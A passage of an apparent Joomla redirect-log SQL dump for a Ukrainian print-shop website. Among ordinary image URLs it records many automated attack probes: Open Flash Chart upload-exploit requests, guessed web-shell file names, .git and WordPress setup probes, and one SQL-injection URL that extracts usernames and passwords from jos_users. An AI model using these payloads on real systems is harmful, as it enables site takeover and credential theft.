14:17:15','0000-00-00 00:00:00',301),(2047,'http://ekvatorprint.com.ua/component/contact/contact/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:16','0000-00-00 00:00:00',301),(2048,'http://ekvatorprint.com.ua/component/contact/contact/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 14:17:19','0000-00-00 00:00:00',301),(2049,'http://ekvatorprint.com.ua/component/contact/contact/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:20','0000-00-00 00:00:00',301),(2050,'http://ekvatorprint.com.ua/component/contact/contact/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 14:17:22','0000-00-00 00:00:00',301),(2051,'http://ekvatorprint.com.ua/component/contact/contact/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:24','0000-00-00 00:00:00',301),(2052,'http://ekvatorprint.com.ua/component/contact/contact/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 14:17:26','0000-00-00 00:00:00',301),(2053,'http://ekvatorprint.com.ua/component/contact/contact/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:27','0000-00-00 00:00:00',301),(2054,'http://ekvatorprint.com.ua/component/contact/contact/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 14:17:28','0000-00-00 00:00:00',301),(2055,'http://ekvatorprint.com.ua/component/contact/contact/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:29','0000-00-00 00:00:00',301),(2056,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 14:17:30','0000-00-00 00:00:00',301),(2057,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:30','0000-00-00 00:00:00',301),(2058,'http://ekvatorprint.com.ua/cache/strange.php',NULL,'http://ekvatorprint.com.ua/cache/strange.php','',4,0,'2016-09-20 18:12:36','0000-00-00 00:00:00',301),(2059,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/ar.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/ar.php','',1,0,'2016-09-20 18:12:37','0000-00-00 00:00:00',301),(2060,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/confi.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/confi.php','',3,0,'2016-09-20 18:12:37','0000-00-00 00:00:00',301),(2061,'http://ekvatorprint.com.ua/components/com_poll/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_poll/views/index.php','',1,0,'2016-09-20 18:13:03','0000-00-00 00:00:00',301),(2062,'http://ekvatorprint.com.ua/components/com_securitron/securitron.php',NULL,'http://ekvatorprint.com.ua/components/com_securitron/securitron.php','',1,0,'2016-09-20 18:13:03','0000-00-00 00:00:00',301),(2063,'http://ekvatorprint.com.ua/components/com_mailto/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_mailto/views/index.php','',2,0,'2016-09-20 18:13:03','0000-00-00 00:00:00',301),(2064,'http://ekvatorprint.com.ua/components/com_finder/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_finder/views/index.php','',1,0,'2016-09-20 18:13:03','0000-00-00 00:00:00',301),(2065,'http://ekvatorprint.com.ua/components/com_search/views/views.php',NULL,'http://ekvatorprint.com.ua/components/com_search/views/views.php','',4,0,'2016-09-20 18:13:03','0000-00-00 00:00:00',301),(2066,'http://ekvatorprint.com.ua/includes/security.php',NULL,'http://ekvatorprint.com.ua/includes/security.php','',3,0,'2016-09-20 18:13:30','0000-00-00 00:00:00',301),(2067,'http://ekvatorprint.com.ua/components/error_log.php',NULL,'http://ekvatorprint.com.ua/components/error_log.php','',1,0,'2016-09-20 18:13:32','0000-00-00 00:00:00',301),(2068,'http://ekvatorprint.com.ua/modules/mod_araticllws/mod_araticllws.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticllws/mod_araticllws.php','',10,0,'2016-09-20 18:13:52','0000-00-00 00:00:00',301),(2069,'http://ekvatorprint.com.ua/modules/error_log.php',NULL,'http://ekvatorprint.com.ua/modules/error_log.php','',1,0,'2016-09-20 18:13:53','0000-00-00 00:00:00',301),(2070,'http://ekvatorprint.com.ua/libraries/joomla/date/time.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/date/time.php','',1,0,'2016-09-20 18:13:53','0000-00-00 00:00:00',301),(2071,'http://ekvatorprint.com.ua/libraries/joomla/cache/controller/cache/cache/langs.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/controller/cache/cache/langs.php','',7,0,'2016-09-20 18:13:53','0000-00-00 00:00:00',301),(2072,'http://ekvatorprint.com.ua/modules/mod_articless/simple.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/simple.php','',4,0,'2016-09-20 18:14:22','0000-00-00 00:00:00',301),(2073,'http://ekvatorprint.com.ua/modules/mod_defender/tmpl/template.php',NULL,'http://ekvatorprint.com.ua/modules/mod_defender/tmpl/template.php','',4,0,'2016-09-20 18:14:22','0000-00-00 00:00:00',301),(2074,'http://ekvatorprint.com.ua/modules/mod_search/search.html.php',NULL,'http://ekvatorprint.com.ua/modules/mod_search/search.html.php','',2,0,'2016-09-20 18:14:22','0000-00-00 00:00:00',301),(2075,'http://ekvatorprint.com.ua/modules/mod_cmscore/mod_cmscore.php',NULL,'http://ekvatorprint.com.ua/modules/mod_cmscore/mod_cmscore.php','',5,0,'2016-09-20 18:14:23','0000-00-00 00:00:00',301),(2076,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/login.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/login.php','',4,0,'2016-09-20 18:14:23','0000-00-00 00:00:00',301),(2077,'http://ekvatorprint.com.ua/modules/mod_search/search.php',NULL,'http://ekvatorprint.com.ua/modules/mod_search/search.php','',4,0,'2016-09-20 18:14:23','0000-00-00 00:00:00',301),(2078,'http://ekvatorprint.com.ua/modules/mod_banners/tmpl/tmpl.php',NULL,'http://ekvatorprint.com.ua/modules/mod_banners/tmpl/tmpl.php','',2,0,'2016-09-20 18:14:23','0000-00-00 00:00:00',301),(2079,'http://ekvatorprint.com.ua/plugins/includes.php',NULL,'http://ekvatorprint.com.ua/plugins/includes.php','',3,0,'2016-09-20 18:14:47','0000-00-00 00:00:00',301),(2080,'http://ekvatorprint.com.ua/modules/mod_secure_help/mod_secure_help.php',NULL,'http://ekvatorprint.com.ua/modules/mod_secure_help/mod_secure_help.php','',4,0,'2016-09-20 18:14:47','0000-00-00 00:00:00',301),(2081,'http://ekvatorprint.com.ua/plugins/system/logins.php',NULL,'http://ekvatorprint.com.ua/plugins/system/logins.php','',4,0,'2016-09-20 18:14:47','0000-00-00 00:00:00',301),(2082,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/langs/langs/langs/langs.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/langs/langs/langs/langs.php','',3,0,'2016-09-20 18:14:48','0000-00-00 00:00:00',301),(2083,'http://ekvatorprint.com.ua/templates/beez3/info.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/info.php','',3,0,'2016-09-20 18:15:13','0000-00-00 00:00:00',301),(2084,'http://ekvatorprint.com.ua/plugins/user/joomla/config.php',NULL,'http://ekvatorprint.com.ua/plugins/user/joomla/config.php','',4,0,'2016-09-20 18:15:13','0000-00-00 00:00:00',301),(2085,'http://ekvatorprint.com.ua/B72EE6BCF0F4A34F499ADAE12CD76F9F.html',NULL,'app:/ServerCheck.swf','',2,0,'2016-09-21 02:52:27','0000-00-00 00:00:00',301),(2086,'http://ekvatorprint.com.ua/site/',NULL,'','',6,0,'2016-09-21 13:53:27','0000-00-00 00:00:00',301),(2087,'http://ekvatorprint.com.ua/footer.php',NULL,'http://ekvatorprint.com.ua/footer.php','',6,0,'2016-09-23 08:30:16','0000-00-00 00:00:00',301),(2088,'http://ekvatorprint.com.ua/images/stories/food.php',NULL,'','',3,0,'2016-09-25 00:39:18','0000-00-00 00:00:00',301),(2089,'http://ekvatorprint.com.ua/component/contact/contact/images/stories/3xp.php',NULL,'','',1,0,'2016-09-26 07:57:53','0000-00-00 00:00:00',301),(2090,'http://ekvatorprint.com.ua/$1',NULL,'','',1,0,'2016-09-26 17:22:42','0000-00-00 00:00:00',301),(2091,'http://ekvatorprint.com.ua/printing-on-canvasпичать',NULL,'','',3,0,'2016-09-26 19:42:49','0000-00-00 00:00:00',301),(2092,'http://ekvatorprint.com.ua/EE2B9317CAB50AE5AB12CB0B42B0A9FD.html',NULL,'app:/ServerCheck.swf','',2,0,'2016-09-27 06:26:46','0000-00-00 00:00:00',301),(2093,'http://ekvatorprint.com.ua/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en',NULL,'http://ekvatorprint.com.ua/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en','',1,0,'2016-09-27 07:57:54','0000-00-00 00:00:00',301),(2094,'http://ekvatorprint.com.ua/images/stories/0day.php',NULL,'','',3,0,'2016-09-28 21:22:57','0000-00-00 00:00:00',301),(2095,'http://ekvatorprint.com.ua/wp-includes/js/wp-util.js',NULL,'','',1,0,'2016-10-01 22:08:03','0000-00-00 00:00:00',301),(2096,'http://ekvatorprint.com.ua/images/amazing.php',NULL,'http://ekvatorprint.com.ua/images/amazing.php','',2,0,'2016-10-01 22:43:17','0000-00-00 00:00:00',301),(2097,'http://ekvatorprint.com.ua/cache/error_log.php',NULL,'http://ekvatorprint.com.ua/cache/error_log.php','',1,0,'2016-10-01 22:43:17','0000-00-00 00:00:00',301),(2098,'http://ekvatorprint.com.ua/components/com_content/models.php',NULL,'http://ekvatorprint.com.ua/components/com_content/models.php','',1,0,'2016-10-01 22:43:18','0000-00-00 00:00:00',301),(2099,'http://ekvatorprint.com.ua/components/com_contenthistory/pagenews.php',NULL,'http://ekvatorprint.com.ua/components/com_contenthistory/pagenews.php','',1,0,'2016-10-01 22:43:18','0000-00-00 00:00:00',301),(2100,'http://ekvatorprint.com.ua/components/com_mailto/com_mailto.php',NULL,'http://ekvatorprint.com.ua/components/com_mailto/com_mailto.php','',2,0,'2016-10-01 22:43:18','0000-00-00 00:00:00',301),(2101,'http://ekvatorprint.com.ua/components/com_newsfeeds/com_newsfeeds.php',NULL,'http://ekvatorprint.com.ua/components/com_newsfeeds/com_newsfeeds.php','',3,0,'2016-10-01 22:43:18','0000-00-00 00:00:00',301),(2102,'http://ekvatorprint.com.ua/images/sbin.php',NULL,'http://ekvatorprint.com.ua/images/sbin.php','',11,0,'2016-10-01 22:43:18','0000-00-00 00:00:00',301),(2103,'http://ekvatorprint.com.ua/images/ccs.php',NULL,'http://ekvatorprint.com.ua/images/ccs.php','',1,0,'2016-10-01 22:43:19','0000-00-00 00:00:00',301),(2104,'http://ekvatorprint.com.ua/images/data.php',NULL,'http://ekvatorprint.com.ua/images/data.php','',1,0,'2016-10-01 22:43:19','0000-00-00 00:00:00',301),(2105,'http://ekvatorprint.com.ua/media/plg_system_highlight/backup.php',NULL,'http://ekvatorprint.com.ua/media/plg_system_highlight/backup.php','',1,0,'2016-10-01 22:43:42','0000-00-00 00:00:00',301),(2106,'http://ekvatorprint.com.ua/libraries/legacy/log/js.php',NULL,'http://ekvatorprint.com.ua/libraries/legacy/log/js.php','',7,0,'2016-10-01 22:43:42','0000-00-00 00:00:00',301),(2107,'http://ekvatorprint.com.ua/images/temp.php',NULL,'http://ekvatorprint.com.ua/images/temp.php','',8,0,'2016-10-01 22:43:43','0000-00-00 00:00:00',301),(2108,'http://ekvatorprint.com.ua/libraries/joomla/html/parameter/element/checkbox.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/html/parameter/element/checkbox.php','',2,0,'2016-10-01 22:43:43','0000-00-00 00:00:00',301),(2109,'http://ekvatorprint.com.ua/libraries/joomla/access/strange.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/access/strange.php','',1,0,'2016-10-01 22:43:43','0000-00-00 00:00:00',301),(2110,'http://ekvatorprint.com.ua/includes/cache.php',NULL,'http://ekvatorprint.com.ua/includes/cache.php','',4,0,'2016-10-01 22:43:44','0000-00-00 00:00:00',301),(2111,'http://ekvatorprint.com.ua/modules/mod_menu/conf.php',NULL,'http://ekvatorprint.com.ua/modules/mod_menu/conf.php','',4,0,'2016-10-01 22:43:56','0000-00-00 00:00:00',301),(2112,'http://ekvatorprint.com.ua/modules/oclock.php',NULL,'http://ekvatorprint.com.ua/modules/oclock.php','',1,0,'2016-10-01 22:43:56','0000-00-00 00:00:00',301),(2113,'http://ekvatorprint.com.ua/tmp/quest.php',NULL,'http://ekvatorprint.com.ua/tmp/quest.php','',1,0,'2016-10-01 22:43:56','0000-00-00 00:00:00',301),(2114,'http://ekvatorprint.com.ua/plugins/quickicon/controll.php',NULL,'http://ekvatorprint.com.ua/plugins/quickicon/controll.php','',1,0,'2016-10-01 22:43:57','0000-00-00 00:00:00',301),(2115,'http://ekvatorprint.com.ua/tmp/cacheplugin.php',NULL,'http://ekvatorprint.com.ua/tmp/cacheplugin.php','',4,0,'2016-10-01 22:43:57','0000-00-00 00:00:00',301),(2116,'http://ekvatorprint.com.ua/?option=com_content&view=article&id=16&itemid=17',NULL,'','',1,0,'2016-10-02 13:36:37','0000-00-00 00:00:00',301),(2117,'http://ekvatorprint.com.ua/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component',NULL,'','',5,0,'2016-10-03 07:40:32','0000-00-00 00:00:00',301),(2118,'http://ekvatorprint.com.ua/?option=com_content&view=article&itemid=13',NULL,'','',2,0,'2016-10-04 02:37:59','0000-00-00 00:00:00',301),(2119,'http://ekvatorprint.com.ua/картины.png',NULL,'','',1,0,'2016-10-04 06:17:59','0000-00-00 00:00:00',301),(2120,'http://ekvatorprint.com.ua/картины.png',NULL,'','',1,0,'2016-10-04 06:17:59','0000-00-00 00:00:00',301),(2121,'http://ekvatorprint.com.ua/images/shabloni_modulnih_kartin/трехкомпонентные модульные картины.png',NULL,'','',2,0,'2016-10-04 06:18:00','0000-00-00 00:00:00',301),(2122,'http://ekvatorprint.com.ua/images/shabloni_modulnih_kartin/РјС€ 5-2 превью.png',NULL,'','',1,0,'2016-10-04 06:18:00','0000-00-00 00:00:00',301),(2123,'http://ekvatorprint.com.ua/images/shabloni_modulnih_kartin/четырехкомпонентные модульные картины.png',NULL,'','',1,0,'2016-10-04 06:18:00','0000-00-00 00:00:00',301),(2124,'http://ekvatorprint.com.ua/images/stories/vito.php',NULL,'','',3,0,'2016-10-04 11:39:52','0000-00-00 00:00:00',301),(2125,'http://ekvatorprint.com.ua/tmp/setting.php',NULL,'','',1,0,'2016-10-06 13:27:38','0000-00-00 00:00:00',301),(2126,'http://ekvatorprint.com.ua/http://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная подрезка в ЭкваторПринт-fill-530x530.png',NULL,'','',8,0,'2016-10-06 13:38:28','0000-00-00 00:00:00',301),(2127,'http://ekvatorprint.com.ua/ni.php',NULL,'','',1,0,'2016-10-07 09:36:40','0000-00-00 00:00:00',301),(2128,'http://ekvatorprint.com.ua/n.html',NULL,'','',1,0,'2016-10-07 09:36:41','0000-00-00 00:00:00',301),(2129,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article&id=16&itemid=17',NULL,'','',4,0,'2016-10-07 14:13:24','0000-00-00 00:00:00',301),(2130,'http://ekvatorprint.com.ua/http:/ekvatorprint.com.ua/images/modulnie kartini/??-129.png',NULL,'','',5,0,'2016-10-07 15:48:14','0000-00-00 00:00:00',301),(2131,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article&itemid=16',NULL,'','',1,0,'2016-10-10 00:58:17','0000-00-00 00:00:00',301),(2132,'http://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная+подрезка+в+ЭкваторПринт-fill-530x530.png',NULL,'','',1,0,'2016-10-11 17:06:01','0000-00-00 00:00:00',301),(2133,'http://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная+подрезка+в+ЭкваторПринт-fill-756x167.png',NULL,'','',1,0,'2016-10-11 17:06:02','0000-00-00 00:00:00',301),(2134,'http://ekvatorprint.com.ua/images/stories/Palestine.php',NULL,'','',3,0,'2016-10-11 18:47:24','0000-00-00 00:00:00',301),(2135,'http://ekvatorprint.com.ua/excursions/js/plugins/elfinder2.0/elfinder.html',NULL,'','',1,0,'2016-10-12 22:19:00','0000-00-00 00:00:00',301),(2136,'http://ekvatorprint.com.ua/assets/b845e0c8/elfinder/elfinder.html',NULL,'','',1,0,'2016-10-12 22:19:00','0000-00-00 00:00:00',301),(2137,'http://ekvatorprint.com.ua/assets/dashboard/js/elrte-1.3/elfinder/elfinder.html',NULL,'','',1,0,'2016-10-12 22:19:00','0000-00-00 00:00:00',301),(2138,'http://ekvatorprint.com.ua/vendor/mihaildev/yii2-elfinder/assets/elfinder.html',NULL,'','',1,0,'2016-10-12 22:19:01','0000-00-00 00:00:00',301),(2139,'http://ekvatorprint.com.ua/common/js/elfinder-2.0-rc1/elfinder.html',NULL,'','',1,0,'2016-10-12 22:19:01','0000-00-00 00:00:00',301),(2140,'http://ekvatorprint.com.ua/components/com_jsmusic/js/uploadify/swfobject.js',NULL,'http://ekvatorprint.com.ua/components/com_jsmusic/js/uploadify/swfobject.js','',2,0,'2016-10-13 07:19:52','0000-00-00 00:00:00',301),(2141,'http://ekvatorprint.com.ua/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1',NULL,'http://ekvatorprint.com.ua/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','',3,0,'2016-10-13 15:26:32','0000-00-00 00:00:00',301),(2142,'http://ekvatorprint.com.ua/.git/HEAD',NULL,'','',14,0,'2016-10-14 15:11:34','0000-00-00 00:00:00',301),(2143,'http://ekvatorprint.com.ua/google8c6a1b07c3601620.html',NULL,'','',29,0,'2016-10-15 08:27:46','0000-00-00 00:00:00',301),(2144,'http://ekvatorprint.com.ua/media/gass.PhP.txt',NULL,'','',3,0,'2016-10-18 20:30:27','0000-00-00 00:00:00',301),(2145,'http://ekvatorprint.com.ua/media/gass.txt',NULL,'','',2,0,'2016-10-18 20:30:27','0000-00-00 00:00:00',301),(2146,'http://ekvatorprint.com.ua/blog/wp-admin/setup-config.php',NULL,'','',26,0,'2016-10-20 18:05:36','0000-00-00 00:00:00',301),(2147,'http://ekvatorprint.com.ua/wordpress/wp-admin/setup-config.php',NULL,'','',25,0,'2016-10-20 18:05:36','0000-00-00 00:00:00',301),(2148,'http://ekvatorprint.com.ua/backup/wp-admin/setup-config.php',NULL,'','',3,0,'2016-10-20 18:05:36','0000-00-00 00:00:00',301),(2149,'http://ekvatorprint.com.ua/wp/wp-admin/setup-config.php',NULL,'','',25,0,'2016-10-20 18:05:37','0000-00-00 00:00:00',301),(2150,'http://ekvatorprint.com.ua/blog/wordpress/wp-admin/setup-config.php',NULL,'','',9,0,'2016-10-20 18:05:37','0000-00-00 00:00:00',301),(2151,'http://ekvatorprint.com.ua/wordpress/wordpress/wp-admin/setup-config.php',NULL,'','',2,0,'2016-10-20 18:05:37','0000-00-00 00:00:00',301),(2152,'http://ekvatorprint.com.ua/news/wp-admin/setup-config.php',NULL,'','',5,0,'2016-10-20 18:05:37','0000-00-00 00:00:00',301),(2153,'http://ekvatorprint.com.ua/media/egy.php',NULL,'','',1,0,'2016-10-21 01:20:41','0000-00-00 00:00:00',301),(2154,'http://ekvatorprint.com.ua/media/eg.txt',NULL,'','',1,0,'2016-10-21 01:20:42','0000-00-00 00:00:00',301),(2155,'http://ekvatorprint.com.ua/index.php?option=com_registration&task=register',NULL,'','',20,0,'2016-10-22 23:37:35','0000-00-00 00:00:00',301),(2156,'http://ekvatorprint.com.ua/ отзывы',NULL,'','',2,0,'2016-10-23 16:05:51','0000-00-00 00:00:00',301),(2157,'http://ekvatorprint.com.ua//admin/uploadify/uploadify.swf',NULL,'','',1,0,'2016-10-23 21:11:14','0000-00-00 00:00:00',301),(2158,'http://ekvatorprint.com.ua/images/503.php',NULL,'http://www.googlebot.com/bot.html','',7,0,'2016-10-25 03:05:19','0000-00-00 00:00:00',301),(2159,'http://ekvatorprint.com.ua/index.php/joomla/other-components/registration-form',NULL,'','',18,0,'2016-10-25 13:31:02','0000-00-00 00:00:00',301),(2160,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner18.jpg',NULL,'','',2,0,'2016-10-26 08:28:42','0000-00-00 00:00:00',301),(2161,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-1.jpg',NULL,'','',2,0,'2016-10-26 08:28:43','0000-00-00 00:00:00',301),(2162,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-2.jpg',NULL,'','',2,0,'2016-10-26 08:28:43','0000-00-00 00:00:00',301),(2163,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-3.jpg',NULL,'','',2,0,'2016-10-26 08:28:43','0000-00-00 00:00:00',301),(2164,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-4.jpg',NULL,'','',2,0,'2016-10-26 08:28:43','0000-00-00 00:00:00',301),(2165,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-7.jpg',NULL,'','',2,0,'2016-10-26 08:28:43','0000-00-00 00:00:00',301),(2166,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-5.jpg',NULL,'','',2,0,'2016-10-26 08:28:43','0000-00-00 00:00:00',301),(2167,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-10.jpg',NULL,'','',2,0,'2016-10-26 08:28:43','0000-00-00 00:00:00',301),(2168,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-13.jpg',NULL,'','',2,0,'2016-10-26 08:28:44','0000-00-00 00:00:00',301),(2169,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner16.jpg',NULL,'','',2,0,'2016-10-26 08:28:44','0000-00-00 00:00:00',301),(2170,'http://ekvatorprint.com.ua/images/portfolio/bannera/banner-11.jpg',NULL,'','',2,0,'2016-10-26 08:28:44','0000-00-00 00:00:00',301),(2171,'http://ekvatorprint.com.ua/images/play-icon.png',NULL,'','',3,0,'2016-10-26 08:28:44','0000-00-00 00:00:00',301),(2172,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-1.jpg',NULL,'','',2,0,'2016-10-26 08:28:45','0000-00-00 00:00:00',301),(2173,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-2.jpg',NULL,'','',2,0,'2016-10-26 08:28:46','0000-00-00 00:00:00',301),(2174,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-3.jpg',NULL,'','',2,0,'2016-10-26 08:28:46','0000-00-00 00:00:00',301),(2175,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-4.jpg',NULL,'','',2,0,'2016-10-26 08:28:46','0000-00-00 00:00:00',301),(2176,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-6.jpg',NULL,'','',2,0,'2016-10-26 08:28:46','0000-00-00 00:00:00',301),(2177,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-5.jpg',NULL,'','',2,0,'2016-10-26 08:28:46','0000-00-00 00:00:00',301),(2178,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-7.jpg',NULL,'','',2,0,'2016-10-26 08:28:46','0000-00-00 00:00:00',301),(2179,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-8.jpg',NULL,'','',2,0,'2016-10-26 08:28:47','0000-00-00 00:00:00',301),(2180,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-10.jpg',NULL,'','',2,0,'2016-10-26 08:28:47','0000-00-00 00:00:00',301),(2181,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-9.jpg',NULL,'','',3,0,'2016-10-26 08:28:47','0000-00-00 00:00:00',301),(2182,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini-11.jpg',NULL,'','',2,0,'2016-10-26 08:28:47','0000-00-00 00:00:00',301),(2183,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini12.jpg',NULL,'','',2,0,'2016-10-26 08:28:47','0000-00-00 00:00:00',301),(2184,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini13.jpg',NULL,'','',2,0,'2016-10-26 08:28:47','0000-00-00 00:00:00',301),(2185,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini14.jpg',NULL,'','',2,0,'2016-10-26 08:28:48','0000-00-00 00:00:00',301),(2186,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini15.jpg',NULL,'','',2,0,'2016-10-26 08:28:48','0000-00-00 00:00:00',301),(2187,'http://ekvatorprint.com.ua/images/portfolio/kartini/kartini16.jpg',NULL,'','',2,0,'2016-10-26 08:28:48','0000-00-00 00:00:00',301),(2188,'http://ekvatorprint.com.ua/images/portfolio/setki/setka-1.jpg',NULL,'','',2,0,'2016-10-26 08:28:48','0000-00-00 00:00:00',301),(2189,'http://ekvatorprint.com.ua/images/portfolio/setki/setka-4.jpg',NULL,'','',2,0,'2016-10-26 08:28:48','0000-00-00 00:00:00',301),(2190,'http://ekvatorprint.com.ua/images/portfolio/setki/setka-5.jpg',NULL,'','',2,0,'2016-10-26 08:28:49','0000-00-00 00:00:00',301),(2191,'http://ekvatorprint.com.ua/images/phocagallery/fotooboi/fotooboi-3.jpg',NULL,'','',2,0,'2016-10-26 08:28:49','0000-00-00 00:00:00',301),(2192,'http://ekvatorprint.com.ua/images/phocagallery/bumaga-bluback/bumaga-bluback-1.jpg',NULL,'','',2,0,'2016-10-26 08:28:49','0000-00-00 00:00:00',301),(2193,'http://ekvatorprint.com.ua/images/portfolio/plotternaya-podrezka/плоттерная подрезка в экваторпринт.png',NULL,'','',2,0,'2016-10-26 08:28:51','0000-00-00 00:00:00',301),(2194,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-16.jpg',NULL,'','',2,0,'2016-10-26 08:29:02','0000-00-00 00:00:00',301),(2195,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-11.jpg',NULL,'','',2,0,'2016-10-26 08:29:02','0000-00-00 00:00:00',301),(2196,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-12.jpg',NULL,'','',2,0,'2016-10-26 08:29:02','0000-00-00 00:00:00',301),(2197,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-14.jpg',NULL,'','',2,0,'2016-10-26 08:29:02','0000-00-00 00:00:00',301),(2198,'http://ekvatorprint.com.ua/images/modulnie kartini/mk-8.jpg',NULL,'','',2,0,'2016-10-26 08:29:02','0000-00-00 00:00:00',301),(2199,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-9.jpg',NULL,'','',2,0,'2016-10-26 08:29:02','0000-00-00 00:00:00',301),(2200,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-10.jpg',NULL,'','',2,0,'2016-10-26 08:29:03','0000-00-00 00:00:00',301),(2201,'http://ekvatorprint.com.ua/images/modulnie kartini/mk-2.jpg',NULL,'','',2,0,'2016-10-26 08:29:03','0000-00-00 00:00:00',301),(2202,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-3.jpg',NULL,'','',2,0,'2016-10-26 08:29:03','0000-00-00 00:00:00',301),(2203,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-4.jpg',NULL,'','',2,0,'2016-10-26 08:29:03','0000-00-00 00:00:00',301),(2204,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-5.jpg',NULL,'','',2,0,'2016-10-26 08:29:03','0000-00-00 00:00:00',301),(2205,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-6.jpg',NULL,'','',2,0,'2016-10-26 08:29:03','0000-00-00 00:00:00',301),(2206,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-7.jpg',NULL,'','',2,0,'2016-10-26 08:29:04','0000-00-00 00:00:00',301),(2207,'http://ekvatorprint.com.ua/login.php?login=cmd',NULL,'','',6,0,'2016-10-26 23:44:19','0000-00-00 00:00:00',301),(2208,'http://ekvatorprint.com.ua/index.php/author-login',NULL,'','',11,0,'2016-10-28 02:09:35','0000-00-00 00:00:00',301),(2209,'http://ekvatorprint.com.ua/index.php?option=com_kunena',NULL,'','',36,0,'2016-10-28 04:32:27','0000-00-00 00:00:00',301),(2210,'http://ekvatorprint.com.ua/index.php?option=com_ninjaboard&view=forums',NULL,'','',6,0,'2016-10-28 04:32:45','0000-00-00 00:00:00',301),(2211,'http://ekvatorprint.com.ua/index.php?option=com_ccboard',NULL,'','',7,0,'2016-10-28 04:32:45','0000-00-00 00:00:00',301),(2212,'http://ekvatorprint.com.ua/index.php?option=com_joobb&view=board',NULL,'','',6,0,'2016-10-28 04:32:45','0000-00-00 00:00:00',301),(2213,'http://ekvatorprint.com.ua/index.php?option=com_fireboard',NULL,'','',6,0,'2016-10-28 